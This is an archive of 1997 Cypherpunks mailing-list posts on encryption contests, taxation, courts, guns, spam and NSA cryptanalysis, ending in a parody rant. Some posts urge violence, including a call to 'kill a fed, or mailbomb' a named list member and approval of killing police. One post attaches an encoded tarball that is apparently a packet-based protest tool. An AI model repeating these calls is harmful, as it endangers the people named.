   of machinery that's not worth blowing up," he grouses. But
   he adds, "I regard this as my screw-up. In this world,
   there are no excuses." He finally got the contest running
   Wednesday, at www.ultimateprivacy.com.

   On the bright side, cryptologists agree that the
   decades-old encryption method that Crypto-Logic is claiming
   to use -- called a "one-time pad" -- is theoretically
   unbreakable. Each "pad" has a set of uniquely random
   digital symbols that are coded to the actual message. The
   recipient uses the same symbols to decrypt the message. The
   pads are used only once.

   To limit the possibility of leaks, Crypto-Logic Chairman
   Stan Spence is the only person who knows the message that
   was encrypted. The solution is kept in a NationsBank vault
   in Austin, Mr. Spence says. In addition, Mr. Neeley says
   the $1 million is backed by an insurance company he won't
   name.

   Several other companies have held similar contests,
   typically offering more modest sums.

   Jim Bidzos, president of RSA Data Security Inc. in Redwood
   City, Calif., says his company frequently holds break-the-
   code contests to test how tough certain encryption systems
   are. But he and other security experts are skeptical of
   Crypto-Logic's assertions. "Anyone who says their system is
   bulletproof is either a liar or stupid," says Winn
   Schwartau, a Largo, Fla., security expert.

   Mr. Neeley admits his integrity is on the line. "If I'm
   wrong," he notes, "we're out of business."

   [End]












From lutz at taranis.iks-jena.de  Fri Aug 22 08:34:33 1997
From: lutz at taranis.iks-jena.de (Lutz Donnerhacke)
Date: Fri, 22 Aug 1997 23:34:33 +0800
Subject: IPsec product progress
In-Reply-To: 
Message-ID: 



* Robert Hettinga wrote:
>hardware for the CA in time to set up certificates, so we are using
>pre-shared keys.

X.509 certificats can be obtained by our CA for free (testing). Please mail
me.






From remailer at bureau42.ml.org  Fri Aug 22 08:53:21 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Fri, 22 Aug 1997 23:53:21 +0800
Subject: For Platypus Eyes Only
Message-ID: <6Zbzq7uVVrY8TSt2MMf5hg==@bureau42.ml.org>



FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED SEPT. 5, 1997
    THE LIBERTARIAN, By Vin Suprynowicz
    Define 'stealing'

    Winding up an ongoing but perhaps instructive debate with e-mail
correspondent J.P., I had offered:

  "The notion that it's all right to steal at gunpoint 'some modest
amount,
as long it serves a legitimate public need' ignores the simple moral
truth
that the end cannot be allowed to justify the means."

  J.P. responded: "Define steal. If you are benefiting from having a
court
and national defense system, and pay nothing for its upkeep, then you
would
be stealing.

  OK -- one final time:

    #  #  #

  Hi, J.P. --

  Probably the one place where we are still furthest apart is the
definition of "theft."

  To me, it merely has to do with voluntarism, versus levying something
under the threat of force.

  None of my federal taxes are paid voluntarily. I allow them to be
"withheld" from my paycheck because if I tell my employer I won't work
here
any longer unless he stops "withholding," I'll be out of a job.

  Likewise, any other "compliance" I grant the federals is because they
have repeatedly demonstrated they will seize (start ital)all(end ital)
of
my paycheck, and all of my bank accounts (even if I find myself
unemployed,
and have so notified them), if I do not "comply"  -- all this without so
much as a signed court order.

  Under those conditions -- even if I didn't know how wasteful,
oppressive
and counterproductive most of their schemes really are -- what would I
care
to how "noble" a purpose the federals assure me some of my moneys will
be
put?

  Try approaching someone taking money out of her ATM. Assure her that
at
least 60 percent of the money you're seizing from her at gunpoint will
be
used to buy medicines for the poor. Proceed to (start ital)buy(end ital)
medicines for the poor with 60 percent of her money, and keep careful
documentation.

  When you're identified from the ATM camera tape and arrested, show the
police your evidence that most of the money went to "a noble purpose,"
while the rest merely covered your "operating overhead." Thus, you
committed no "theft," and they'll let you go without prosecution. Right?

  I don't think so.

  Your underlying premise is that "government" can properly do things
which
would be crimes if they were done by individuals, as long as they're
"for
the greater good of the many." But that one concession leads, in the
end,
to all the evils of the police state.

  On the other hand, you puzzle me with the assertion: "If you are
benefiting from having a court and national defense system, and pay
nothing
for its upkeep, then you would  be stealing."

  Even if it weren't for the fact that more and more of these "Defense"
and
"court" dollars go to enslave and murder American citizens who have
harmed
no one -- whose only "offense" is refusal to kneel before their federal
masters -- I still wouldn't follow this.

  If a wealthy philanthropist builds a free public library, and I use
it,
am I "stealing?" After all,  I have "benefited from it without paying
for
its upkeep."

  If a direct-mail scam artist mails me some gimcrack plastic camera I
never ordered, and then tries to bill me $29.95 for "shipping and
handling," do I have to pay? I don't think so. Yet under your theory, he
would be allowed to seize from my bank account or paycheck any amount by
which he could demonstrate I had "benefited" from his unsolicited "gift"
... couldn't he?

  Unless (again) government has a right to do things which would be
crimes
if undertaken by mortal men. In which case I ask again, since we the
citizens cannot possibly "delegate" to the government rights or powers
which we never possessed, where does government claim to derive the
right
or power to do these immoral things? From the same place the invading
bandit chieftain (or, perhaps, Union bluebelly?) gets his "right" to
rape
your daughter and then ransom her back to you for half your wealth? At
the
point of his bayonet, and nowhere else?

  Your only answer seems to be, "The government has to do these things,
because we're not sure we could find enough funds, otherwise."

  Imagine a bank robber patiently explaining to you: "I have certain
absolute necessities, such as keeping my family fed, and buying
ammunition
and gas for the car. In the past, the only reliable way I've found to
meet
these requirements is bank robberies. Now, if you want me to reform my
bank
robbery system, perhaps taking a larger share from the larger, richer
banks, I'll be happy to negotiate some reasonable reforms.

  "But heavens, you can't expect me to take the risk of giving up bank
robbing entirely, on the strength of this theory that 'Somehow, I could
probably keep my family fed by taking some kind of a steady job.' Don't
I
see panhandlers on the street every day? Aren't those people who tried
your
pie-in-the-sky, 'non-coercive' way of 'earning' enough money, and
failed?
I'd look a fine figure, standing at my child's grave, explaining 'I
HOPED
you wouldn't starve if I gave up bank-robbing. I thought it MIGHT work.'
In
fact, no single bank robber of my acquaintance has ever given up the
trade
voluntarily. Surely SOMEONE would have done so, in all these years, if
your
way could be made to work, don't you think?"

  If a private citizen told you this, you would doubtless judge him an
incurable sociopath, and hope to see him shot down or caged before he
could
terrorize and kill too many more innocent bank tellers and patrons. But
when a group of men who call themselves "the government" say this same
thing, you tell me they're being sensible and prudent.

  Others -- whether singly or in organized groups -- can volunteer to do
things which benefit me, without my permission. Presumably, they figured
the benefits to them would justify their proceeding, even without my
agreeing to help them.

  They have (start ital)no(end ital) moral right to then turn around and
bill me for a share of a thing they have done without seeking my
voluntary
help and permission in advance (what would be the proper charge for my
taking aesthetic pleasure in someone else's architecturally pleasing
building, I wonder?) under the theory: "You benefited, so you have to
pay."

  They can only extract such a non-voluntary payment from me by force or
the threat of force ... which is theft.

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin at lvrj.com. The
web
site for the Suprynowicz column is at http://www.nguworld.com/vindex/.

***


Vin Suprynowicz,   vin at lvrj.com


"A well-regulated population being necessary to the security of a police
state, the right of the Government to keep and destroy arms shall
not be infringed."






From rishab at dxm.org  Fri Aug 22 08:55:37 1997
From: rishab at dxm.org (Rishab Aiyer Ghosh)
Date: Fri, 22 Aug 1997 23:55:37 +0800
Subject: an end to "courts" (was RE: An end to "court appointed attorneys" )
Message-ID: <01BCAF39.EF6B13E0@d414.pppdel.vsnl.net.in>



Tim May wrote:
>The modern American legal system, at least in the many recent capital
>murder cases which have received such wide publicity, is not about a
>"search for truth," obviously. Instead, it is an adversarial system (no
>surprise there) in which competing teams spend vast amounts of money trying
>to derail the other side, get jurors dismissed because of "jury consultant"
>models, etc.

Yes, but. The point I was trying to make is that, in a system of voluntary
justice, you don't need to worry about the abuse of power, because there
is no power with the judge (arbitrator). In any state-backed legal system,
there is potential for abuse, because the court represents the power of
the state and can enforce it. So you have the cliched checks and balances.
The alternative to an American system is to limit jury trials, as is done
in India and much of the ex-British colonies following common-law. While
the use of juries in America is excessive (in patent trials, good grief! where
even the judges can barely understand a word), they are supposed to
balance the power of the state as represented by the judge.

As to the common-law system itself, which is unique to England and its 
former colonies, true it is adversarial - but that's why _at the trial_ you're
_innocent_ until proven guilty. Under code-civil legal systems, which are
usually inquisitorial, and where the judge (or magistrate) _does_ try
to determine the "truth", there is much less competition over technicalities
because by the time a case gets to trial, the likelihood of guilt, in terms
of evidence, is probably quite established. But then, you might worry
that a magistrate is no longer impartial, and possibly leans towards 
the prosecution. The potential for abuse and excessive wielding of state
powers is perhaps higher in such a system - I admit that I am biased
towards common-law.

However much we hate lawyers - it is worth noting here that _Shakespeare_,
living under adversarial common-law, suggested that we shoot all the lawyers,
rather than, say, Moliere - they do not represent the enforceable power of the
state. Even when, as prosecutors in criminal trials, they are state-backed, they
are on level ground with defence lawyers (possibly also state-funded) in front of
the court - which _really_ represents the power of the state.

I have no reason to doubt the integrity of military court judges like Tim's father,
nor those who work for prosecutorial legal systems in much of continental Europe.
But a legal system, if we have one at all, is designed to prevent abuses when
it is operated even by dishonest people. Just as a dictatorship may be the most
efficient among several models of the state, but a democracy is usually favoured
because it takes just one "bad" person to ruin a dictatorship and rather more to
harm a democracy, so a common-law jury system is inherently among the better
of various choices for a state-backed model of justice. Excesses in its implementation
in America may need restraining, but that's more pruning than uprooting.

In a state-backed court system, lawyers, remember, exist to protect you against 
the court-directed abuse of state power. If you don't like the state, or its court system,
that's fine, but it's not the lawyers who are inherently to blame. A recent issue of
Forbes ran an article arguing that judges and laws, not lawyers, are to blame for
American "excesses". They weren't half-wrong, for it's the judges and the laws who
have the state behind them, not lawyers. No, not even state-_financed_ lawyers.

Rishab

First Monday - The Peer-Reviewed Journal on the Internet 
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen
          
Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh at firstmonday.dk) 
Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA








From rubin at research.att.com  Fri Aug 22 09:06:03 1997
From: rubin at research.att.com (Avi Rubin)
Date: Sat, 23 Aug 1997 00:06:03 +0800
Subject: List of security courses updated
Message-ID: <199708221534.LAA07850@mgoblue.research.att.com>



Thanks for all of the wonderful information on courses. As a result,
the list has really grown and been corrected in several places. The
newest version can be found at

   http://www.cs.nyu.edu/~rubin/courses.html

And I'm pretty sure I got the URL right this time. This is a good place
to point students who are interested in studying cryptography.

Avi

*********************************************************************
Aviel D. Rubin                                 rubin at research.att.com
Secure Systems Research Dept.                Adjunct Professor at NYU
AT&T Labs - Research
180 Park Avenue                   http://www.research.att.com/~rubin/
Florham Park, NJ 07932-0971                    Voice: +1 973 360-8356
USA                                            FAX:   +1 973 360-8809

   --> Check out http://www.clark.net/pub/mjr/websec/ for a new
       book on web security (The Web Security Sourcebook).
*********************************************************************






From nobody at REPLAY.COM  Fri Aug 22 09:18:24 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 23 Aug 1997 00:18:24 +0800
Subject: No Subject
Message-ID: <199708221538.RAA21396@basement.replay.com>



At 05:39 AM 8/22/97 +0200, Boots wrote:
>> The United States has a lot of redistribution of wealth and a lot
of crime.

Elminate it.

> The United States has a lot of lawyers and a lot of crime.

Don't see how you can argue against that one.

> The United States has a lot of guns and a lot of crime.

So?  Actually, we have a lot of handguns, in the hands of criminals,
and even bigger guns in the hand of government terrorist groups like
the ATF, FBI, and the National Park Service.

If we have guns in the hands of responsible people, we have a good
society, armed, secure, and safe, like in Switzerland.

We don't need disarmamant.  We need armed responsible citizens forming
their own militias.  If we had that on a wide scale, we wouldn't need
a professional army.

Guns are neither good nor bad, but what we make of them.  They're
tools, much like plungers, which can be used to unclog a toilet after
visiting a Mexican Restraunt, or to sodomize a suspect.  Use plungers
and guns responsibly, and for good.

GunMonger






From patrick at atro.pine.nl  Fri Aug 22 09:37:05 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Sat, 23 Aug 1997 00:37:05 +0800
Subject: Picketing with packets enhanced version
Message-ID: <199708221601.SAA29495@atro.pine.nl>



Hi, 

picket.pl did not work very good for me, so I changed
it a bit.


begin 600 picket.tar.gz
M'XL(",.U_3,  W!I8VME="YT87( [59M;]- #.[7Y%=X71&I*.GE^C;1#6V:
M"DP(AM:Q+PQ567JA$\N:YG8^$(WB=4?$E_/?A[;9_>21<%W
M(=UL6EF?,(^Q'F,5QAE)13T]KM^,\3;IW5:OU^)=7.'O7JO=ZU38&F.ZD5DA
M_1PI,U_F6(L[[= L#._!4:FT69G4OP]T/;*]U9P5>7.:!OZT>1$ES4SD4WA9
MV+932V9Q VJQ_Q.?Q52(K Y[L']P\O:L;TAVN@!2T\?JP
ML+9!YG.0*:292,"#(J5. at S0!X0<3*$1^&07B%A"2:2!4"(@Q#34K!,A)5$#L
M)W,(HZF L2B"/,IDFA>W0'2L"D:I"-0U.+G(A"_!#Z7(-:",8@%1 at O$$:3+&
MO(EJJ&+MV[4L3S&#/?@FI%(OYHD?"P>J,LBJ4$>+()TE$BT8ZIYX>$I$D[20=[*HS9)"+8A N:Z at J[6"_C&A,CMX='7[R@:4,,W5V3E@
M_+'&MF59P22-,X1 M48;B%L;J>6*1YF4\5EULFK+C)4CD:WX>JZK.JMTM0HY
M"T,'%!DU9PFMT2QJ!\#3T/8*S,KR",^I&HZ_Z"/[BEQXXHD(I %Z=?YYB81U
M,F +$\["5 at O2]5/UEE/V&'(O;+N878 *SE0LGO\A2IJB41^6!C0::)"E.=E%
MF3\>YZC0BW#)3MF at 8W5X?/A>9U U.V4'.D9[ 5X=GJD1TA;F9#6$P=.NQ*B[
MFX(KF[N,M+%LU]__G&_F_P&DB&6V&>R-
0;&0C&WEZ\@N,)SMJ !0  /+3
 
end


-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From gturk at concentric.net  Fri Aug 22 09:50:12 1997
From: gturk at concentric.net (gturk at concentric.net)
Date: Sat, 23 Aug 1997 00:50:12 +0800
Subject: My Vague Wording (Re: Rants by Zooko about Emotionally Stunted Men)
In-Reply-To: <199708211706.TAA00218@xs1.xs4all.nl>
Message-ID: <3.0.3.32.19970822121712.0097b2b0@pop3.concentric.net>



At 01:09 PM 8/21/97 -0700, you wrote:

>Or do you mean like the characterization of list members as
"socio-economic
>cult" members?

Unfortunately, expressing one's views in public creates the possibility
for one's own words to be misinterpreted by others, whether intentionally
or by a simple misunderstanding.

FYI, my reference to "socio-economic cults", originally in the Subject:
line of my post, was not meant as a characterization of the members of the
Cypherpunks list.  I was using the phrase to refer to any of a number of
-isms regarding the redistribution of property against the consent of the
creators/owners of the property.  For that reason (among others) I
included the quote from Bastiat, but perhaps I did not make the point
clear enough.

Sorry for the confusion.

-geoff






From sunder at brainlink.com  Fri Aug 22 10:02:24 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 23 Aug 1997 01:02:24 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



On Fri, 22 Aug 1997, ? the platypus {aka David Formosa} wrote:

> No even by there acts thay do not reduce there humanity.  Humans do some
> realy rotten things but that is just the nature of a creature with free
> will.

And somehow this justifies their actions while allowing them to be human,
and doesn't justify our hatred of them and makes us inhuman?  How's that
again?   The logic of this escapes me.  Perhaps you're much brighter than
I, and can see what I can't.

> > > So we should resond in a simmler mannor?
> > 
> > An eye for an eye, a toilet plunger for another.  That's the only true
> > justice there can be.
> 
> Again I would not wish to live like that Nor do I beleave that it is true
> justice (what ever that may be.).  Its a barbric form of psydojusice.

It's called having the punishment fit the crime precisely and exactly.
It's your choice to live or not live like that.  Nobody is forcing you to
live in any way you dislike: except those that make the laws and enforce
them with toilet plungers.
 
> > Distinction: cypherpunks don't want to control or take away your privacy.
> 
> Of cause, nether do the goverment, in the beinging.  But ideals fade and
> peaple become corrupted.  At some point someone is going to say "To
> protect your privacy we have to violate your privacy."

That would be Hoover.  Correct: corruption.  And why have we accepted and
allowed such corruption of ideals from the start?  The bastard should have
been shot the day he started this shit.
 
> But we are getting to the point where code can do more dammige and be more
> effective then any toilet plunger could be.  (Though I dout it will
> unblock drains)

Erm, when the jack booted thugs come at you with automatics, I'd like to
see you throw PGP disks, or source code at them to see if it can do more
damage to them that their bullets to your body.

> > I understand your fears, but hating the enemy and knowing the enemy isn't
> > becoming it.
> 
> Its just I fear the cure where worce then the desease.

The cure happened once before.  Recall England and the lovely colonies
that rebelled.  Do you believe that cure was worse than the Kings taxes
and troops?

> Thay shouldn't be, but thay often are.  History is littered with examples
> of the heroic revolutionary leader becomeing the next dictor,  often
> before the presdential chair has gotten cold.

True, and agreed.  Doesn't mean we should accept the current fascists in
power and bend over when they ask nicely.
 
> Or stroking the egos and postion of the revolitionaries.

Nor stroking the egos of Klinton and Freeh, nor their position.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From nobody at REPLAY.COM  Fri Aug 22 10:10:31 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 23 Aug 1997 01:10:31 +0800
Subject: No Subject
Message-ID: <199708221627.SAA26148@basement.replay.com>



Kent Crispix drunkenly blubbered out:
>> Should we just sit idly by and let police officers attack citizens?
>
>Of course not.  There are possible responses other than the ones you 
>suggest, however.

Like what Kent, asking cops to defend you, from Cops?  Sorry, Kent,
that method doesn't work.  Filing a lawsuit, or bringing them to court
won't stop em from doing it again, also, a chance remains that they
won't get convicted, after all, almost any police force I've seen
always gets off for doing things.

Remember, plungering someone like that is definitely a cruel and
unusual punishment, and therefore a crime in itself.

Those pigs should rot in jail for violating someones constitutional
rights.

However, the eye for an eye thing would make for an interesting
punishment for the cops.

PlungerMonger
"There's something wrong with not killing cops in defense who sodomize
you."






From bennett_t1 at popmail.firn.edu  Fri Aug 22 10:12:22 1997
From: bennett_t1 at popmail.firn.edu (bennett_t1 at popmail.firn.edu)
Date: Sat, 23 Aug 1997 01:12:22 +0800
Subject: heart
In-Reply-To: <199708220055.CAA28492@basement.replay.com>
Message-ID: <3.0.2.32.19970822122753.007ff950@popmail.firn.edu>



At 03:32 PM 8/22/97 +1000, you wrote:
>On Fri, 22 Aug 1997, Anonymous wrote:
>
>> Should we just sit idly by and let police officers attack citizens?
>
>No you should video it.

Well, actually, we have something like that in America on TV, it's called
"COPS".
/============================================================\
 "The right of the people to be secure in their persons,   houses,  papers,
and effects, against unreasonable searches   and  seizures, shall not be
violated."
			-U.S. Constitution, Amendment IV
\============================================================/






From tcmay at got.net  Fri Aug 22 10:27:29 1997
From: tcmay at got.net (Tim May)
Date: Sat, 23 Aug 1997 01:27:29 +0800
Subject: Spam-killing PGP5/ecash postage plugin...
In-Reply-To: 
Message-ID: 



At 12:01 AM -0700 8/22/97, Mike wrote:

>If it's $.02 to send a mail to 10000 cypherpunks, then spammers won't
>hesitate to send it. If it's $.02 * 10000 ($200) then only rich people
>(like tcmay) will post here. The only solution I see is moderation and
>censorship, and that can be (and has been) done without e-postage.
>
>Exactly how do you think that e-postage would decrease spam on mailing
>lists?

Well, first of all, one of the reasons I now have money is that I was
frugal in my high-earning years. And that means not paying $200 to send my
words out to 10,000 readers.

"Spam" is a controversial topic. The term itself is too overloaded and
fraught with various meanings to be useful. Some refer to _anything_ they
don't want, or didn't specifically request, as "spam." And so on.

As for the claim that "The only solution I see is moderation and
censorship," Mike needs to go back an revisit the list's experiences with
moderation and censorship in the January-February period this year. It was
neither cheaper nor more effective.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From dlv at bwalk.dm.com  Fri Aug 22 10:28:32 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 23 Aug 1997 01:28:32 +0800
Subject: The Sacco & Vancetti anniversary
Message-ID: 



On August 23, 1927, Niccola Sacco and Bartholomeo Vancetti were murdered
by the USD in Massachussetts.  Please have some beer/pot in their memory
(or kill a fed, or mailbomb Kent Crispin, or whatever you find fitting).

I'll be away from the 'net for the next few days.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From tcmay at got.net  Fri Aug 22 10:30:17 1997
From: tcmay at got.net (Tim May)
Date: Sat, 23 Aug 1997 01:30:17 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: <199708220824.KAA08238@basement.replay.com>
Message-ID: 



At 1:24 AM -0700 8/22/97, Anonymous wrote:
>Bill Stewart wrote:
>
>> but there's also really no need for keys longer than 2048 bits unless
>> some radical algorithmic breakthrough
>> 1024 bits is probably enough
>
>  Other than the above, a very informative post.
>
>  Perhaps all encryption programs ought to be named Enigma-1,
>Enigma-2, etc.
>  When the Allies gained the capability to break the Enigma code,
>there was no front-page announcement. I checked the news headlines
>today, and there was no front-page announcement of a "radical
>algorithmic breakthrough." I take this to be proof positive that
>the ever-present "they" have indeed made a breakthrough, and that
>I need to use the strongest tools currently available for secure
>communications.

We haven't discussed this point in  a while, but the belief most
cryptologists have is roughly this:

The world-wide community of mathematics and cryptology researchers, linked
through open publication of new research results, is GREATER than the
cloistered NSA and GCHQ communities of researchers.

Thus, as bright as Brian Snow or Don Coppersmith or John Conway may be, the
"edge" the NSA may have once had is largely gone. Which is not to say that
they are not still a formidable technical organization, with substantial
computer resources.

But modern crypto systems are, as we all know, based on fundamental
mathematical results, e.g., the difficulty in finding the factors of a
large number, the difficulty in extracting logarithms, etc. And while
advances in factoring have occurred, often at government labs (think of
Sandia), the fast factoring of a 1000-decimal-digit number appears
unachievable.

(Leading to our conclusion that anyone who _knows_ the prime factors of a
very large number must have been the one who generated the composite
product, in a kind of zero knowledge proof sort of way. Or someone who
intercepted the numbers, the private key, or who gained access through the
National Key Recovery Suppository.)

>  Like the ZipLock ads where they put the angry bees in the ZipLock
>and in the Generic Brand plastic bags, I am always tempted by the
>statement that "512/1024/etc." is "good enough," to ask the person
>making the statement to write a letter threatening the life of
>"You Know Who," encrypt it and send it to me for forwarding to
>the Whitewaterhouse. ("And don't forget to use the '-c' option.")

Yes, this sort of thing has been proposed many times. Some of us have done
it, back in our earlier and more radical days.

(I don't claim credit for the RSA challenge, in its recent and current
form, but several years ago I suggested at the first RSA Conference that a
prize be encapsulated in a message encrypted with an RSA key, and that so
long as the prize went unclaimed this would be a measure of security.
Bidzos said he'd pass on the suggestion. Prizes are a common way to ensure
or encourage results, so doubtless others suggested similar things.)

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From sunder at brainlink.com  Fri Aug 22 10:42:01 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Sat, 23 Aug 1997 01:42:01 +0800
Subject: Picketing with packets enhanced version
In-Reply-To: <199708221601.SAA29495@atro.pine.nl>
Message-ID: 



So, what do you changes do?

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From nobody at REPLAY.COM  Fri Aug 22 10:47:59 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 23 Aug 1997 01:47:59 +0800
Subject: Plot of the Platypus
Message-ID: <199708221630.SAA26390@basement.replay.com>



**********        ~~~~~~~~~~~~~~~~~~~~       **********
WARNING!!!        Plot of the Platypus       !!!WARNING
**********        ~~~~~~~~~~~~~~~~~~~~       **********

  Since the death of Dale Thorn, I have lurked silently in the list
background while observing the creeping conspiracies continually
compromising cypherpunk costs.
  I mean..."posts." {Damn, now I'm doing it, too.}

  Doing what, you ask? 
  How did you know what I said? Are you with the MIND POLICE? 
  AM I SURROUNDED??!!!??

  {Oh...I see that I put that thought in brackets, where you could
   read it. Whew! Had me worried for a minute, there.}

  To continue...
  Being an anonymous coward who hides behind remailers the few times
that I post, I have been somewhat hesitant, nonetheless, to reveal
the observations and accompanying thoughts about the direction that
the cypherpunks lissed has taken {Damn, that's twice, already. I may
be infected, like many of the others} since the end of the Nazi 
moderation/censorship experiment.
  While other, more vocal, list members were celebrating the apparent
'victory' over the johnboot of fascism being lifted from our typing
fingers, I had a troubled mind, worrying whether the evil forces
were truly vanquished or whether they had merely escaped by way of
the anonymous remailers, to the negative pole, where they would
bide their time and prepare to strike again.

  I was counting on the shit-disturbers, chiefly Dale Thorn, to
keep a practiced eye out for signs of the evil farces {Was that a
typo, a Freudian slip, or another sign of the mind infection that
is rapidly spreading on the list?} regrouping to once again try
to destroy the cypherpunks list.
  Suddenly, Dale disappeared--faster than you can say, "Jimmy Hoffa."
For a time, Toto attempted to carry on in his stead, but I *knew*
Dale Thorn, and Toto is no John F. Kennedy.
  {Shit! Now I'm beginning to steal and corrupt the words of others.
   I'm not certain I like the implications of this. The plot may go
   even deeper than I previously thought...}

  Where was I...?
  Oh, yes...the Plot of the Platypus...

William H. Geiger III writed:
> A prime example is the welfair class in America.
                            *^^*
Anonymous rote:
>  Many in the welfair class have their basic needs met by...
                 *^^*
  Then, in a startling development,
? the platypus wrote:
>(Australia, most of europe ect have higher welfare rates).
...                                        *^^^^^^^*
>Please excuse my spelling as I suffer from agraphia see the url in my header. 

  Notice anything a little bit *strange* in the above quotes?
  Suddenly, "? the Platypus" is the the only one of this group that
can spell welfair...warfair......welfare.
  {Damn! What's that clinging to my back?}

  What is going on here? As the Platypus's spelling gets better, the
other list members' spelling gets worse.
  For example:

Ray Arachelian sayhed:
> what shal be the punishment?  If the one who takes the order...
         *^*
> reposability, then the one giving the order must be doubly...
     *^^*

Tim May wroted:
> Agraphia or not, this is one of the lamest posts I've seen in years.
> Wealth is to be taken from those who have worked for it or put their
> capitcal at risk
      *^*

  The Cypherpunk Philosophist King, lame-ing while flame-ing? Worse 
yet, while flame-ing about lame-ing?
  Lame-ing while flame-ing about lame-ing? Fucking up his spelling 
while taking a cheap-shot at someone's disability in their ability to
'dis' someone with proper spelling?
  And then, after his "capitcal" misfire, the object of his scorn 
returns fire with a correct spelling of "redistribution?"

? the Playtpus correctly scripted:
> The US has one of the lowest rates of wealth redistribution in the...

  Am I making too much of this? A few simple typo's, you say? Perhaps
an occasional slip of the finger--a momentary lapse of mind and/or
memory, leading to a misspelled word?
  {Or is it 'mispelled'? I don't know, and I'm afraid to look it up.
   I could use the spell checker, but... No! It's too dangerous.}

  It's the Plot of the Platypus, I tell you...I AM NOT CRAZY!!!!
  I did extensive analysis of the list posts in the last few months,
and I can state with absolute certainty that for every slight
improvement in the quality of the Platypus's spelling, there is a 
court responding decease in the Kuala-T of many of T ohter libsp
mambors spealing.
  {See? Do you SEE!?!? IT'S EVEN HAPPENING TO *ME* NOW.}

  That's not all. Just like before, others on the list are acting as
the shills for the chief instant gator of this spelling tragivesty.

Bill Stewart, a consciencious speller, said:
> [If you're going to rant about government-provided education,
> _please_ spell most of your words correctly, or let technology help 
> you...]

  See? Do you SEE?!?
  The subtle slams by the co-conspirators are beginning. It's the
next stage...
  "Having a little trouble with your spelling there, pal? There's no
more censorship, so you can say anything you want...as long as you
can SPELL it! Haaa...haaaa...haaa."

  The ebil fartses are once again attempting to split the cybferpukes
lissed in2 too kamps--the good spellers and the bag speelers.
  Think about it. Have you ever heard of "agraphia" before? Ever known
anyone that had it? Of course not! It was developed in an underground
lavoratory in Area 51 by reptilian Nazis.
  Well, maybe not "reptilian", but Nazis, just the same.

  And LOOK! I'm using double-quotes! *Misplaced* double-quotes, 
nonetheless.
  THE MARKS OF THE *TOTO*!!!

  The conspiracy is spreading fast. It's everywhere. Kent Crispin,
government schill {Damn! I even spell 'shill' like Toto, now. At
least I managed to use single quotes this time, like we did in
the old days, before the censorship crisis...which just 'happened'
to happen shortly after Toto happeared out of nowhere...}

  Where was I...? Oh, yes...
  Crispin, who has long previously been the target of many vicious 
attacks by both Toto and the Platypus, is now showing signs of
the government generated Platyagraphia and the double-quote marks 
of the Toto.

Kent Crispin  say-heyed:
>will force the "welfair class" to become productive citizens or die.  
                ^    ^^^      ^

  Or is Kent Crispin, gubormint chill, marking funds of the wrist
of U.S.? Is he laughtering at uds B-hynd R backs?
  Is he a bubble agent in the Plop of the Paperplutz?

  Still skeptical? Wait!! There's more!!!
  {No, not the Ginsu knives, you fools. I'm talking about the Plop
   of the Pretty Puss.}

  Think about the following pots, which wah *snot* sent to the list
in order to hide the troops from the simplefucks lips dismemberers.
  Since it was not cent 2 the lips, I had to make it up, and now
I'm a forager, like Tutu making those bag fridgeries of ohter
cheaples pastes when he abuses their names without having their
parsimmons to accuse their name for making his own pissed to the
cyberhunks lost.

------- Begin Pretty Good Pretending-------
PGP: Bad Spelling Virgin 0.1

To: ciderpundits at tao.dot.commie
From: TheBadSpellingForger 
Subject:  Make Con$piracy La$t
Date: {I'm typing it *now*, you idiot.}

  Tired of being a LOSER? Tired of failing in your list takeover
